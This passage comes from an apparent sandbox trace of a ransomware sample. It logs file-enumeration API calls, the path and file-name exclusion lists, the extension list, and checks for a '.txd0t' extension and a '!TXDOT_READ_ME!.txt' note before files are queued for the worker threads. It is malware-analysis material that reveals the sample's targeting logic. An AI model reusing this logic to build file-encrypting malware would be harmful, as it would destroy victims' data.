ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1040", cAlternateFileName="")) returned 1 [0085.741] StrCmpW (psz1="1040", psz2=".") returned 1 [0085.741] StrCmpW (psz1="1040", psz2="..") returned 1 [0085.741] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.742] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0085.742] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1040", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\windows\\system32\\") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\windows\\system\\") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\appdata\\local\\") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\boot\\") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\perflogs\\") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\programdata\\") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\drivers\\") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\wsus\\") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="crypt_detect") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="cryptolocker") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="ransomware") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="C:\\WINDOWS") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="C:\\Program Files") returned 0x0 [0085.742] GetProcessHeap () returned 0xe30000 [0085.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0085.742] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0085.742] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\*") returned="C:\\588bce7c90097ed212\\1040\\*" [0085.742] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2770 [0085.743] StrCmpW (psz1=".", psz2=".") returned 0 [0085.743] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.743] StrCmpW (psz1="..", psz2=".") returned 1 [0085.743] StrCmpW (psz1="..", psz2="..") returned 0 [0085.743] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe3b, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0085.743] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0085.743] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0085.743] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0085.743] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\") returned="C:\\588bce7c90097ed212\\1040\\" [0085.743] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned="C:\\588bce7c90097ed212\\1040\\eula.rtf" [0085.743] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.743] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0085.743] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0085.743] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0085.744] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0085.744] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0085.744] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0085.744] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0085.744] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0085.744] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0085.744] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0085.744] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0085.744] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0085.744] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0085.744] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0085.744] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.744] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.744] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0085.744] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0085.754] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.754] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1040\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" [0085.754] SetEvent (hEvent=0x3fc) returned 1 [0085.754] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x138bc, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0085.754] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0085.754] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0085.754] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0085.754] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\") returned="C:\\588bce7c90097ed212\\1040\\" [0085.754] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" [0085.754] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.754] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0085.754] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0085.755] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0085.755] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0085.755] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0085.755] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0085.755] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0085.755] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0085.755] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0085.755] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0085.755] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0085.755] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0085.755] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0085.755] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0085.755] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.755] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.755] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0085.755] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0085.771] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.771] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" [0085.771] SetEvent (hEvent=0x3fc) returned 1 [0085.771] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0085.771] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0085.771] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0085.771] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0085.771] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\") returned="C:\\588bce7c90097ed212\\1040\\" [0085.771] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" [0085.771] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.771] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0085.771] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0085.771] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0085.771] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0085.771] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0085.771] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0085.771] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0085.771] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0085.771] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0085.771] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0085.771] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0085.771] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0085.771] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0085.771] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0085.771] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.771] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.771] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0085.771] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0085.772] FindClose (in: hFindFile=0xec2770 | out: hFindFile=0xec2770) returned 1 [0085.772] GetProcessHeap () returned 0xe30000 [0085.772] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.772] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1041", cAlternateFileName="")) returned 1 [0085.772] StrCmpW (psz1="1041", psz2=".") returned 1 [0085.772] StrCmpW (psz1="1041", psz2="..") returned 1 [0085.772] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.772] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0085.772] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1041", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\windows\\system32\\") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\windows\\system\\") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\appdata\\local\\") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\boot\\") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\perflogs\\") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\programdata\\") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\drivers\\") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\wsus\\") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="crypt_detect") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="cryptolocker") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="ransomware") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="C:\\WINDOWS") returned 0x0 [0085.772] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.773] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1041", lpSrch="C:\\Program Files") returned 0x0 [0085.773] GetProcessHeap () returned 0xe30000 [0085.773] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0085.773] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0085.773] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\*") returned="C:\\588bce7c90097ed212\\1041\\*" [0085.773] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2470 [0085.773] StrCmpW (psz1=".", psz2=".") returned 0 [0085.773] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.773] StrCmpW (psz1="..", psz2=".") returned 1 [0085.773] StrCmpW (psz1="..", psz2="..") returned 0 [0085.773] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x278d, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0085.773] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0085.773] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0085.773] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0085.773] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\") returned="C:\\588bce7c90097ed212\\1041\\" [0085.773] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned="C:\\588bce7c90097ed212\\1041\\eula.rtf" [0085.773] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.773] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0085.773] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0085.773] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0085.773] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0085.773] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0085.773] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0085.773] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0085.773] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0085.773] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0085.773] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0085.773] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0085.773] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0085.773] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0085.773] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0085.774] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.774] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.774] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0085.774] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0085.827] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.827] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1041\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" [0085.827] SetEvent (hEvent=0x408) returned 1 [0085.828] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x10a82, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0085.828] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0085.828] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0085.828] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1041", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041") returned="C:\\588bce7c90097ed212\\1041" [0085.828] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\") returned="C:\\588bce7c90097ed212\\1041\\" [0085.828] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1041\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" [0085.828] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.829] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0085.829] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0085.829] 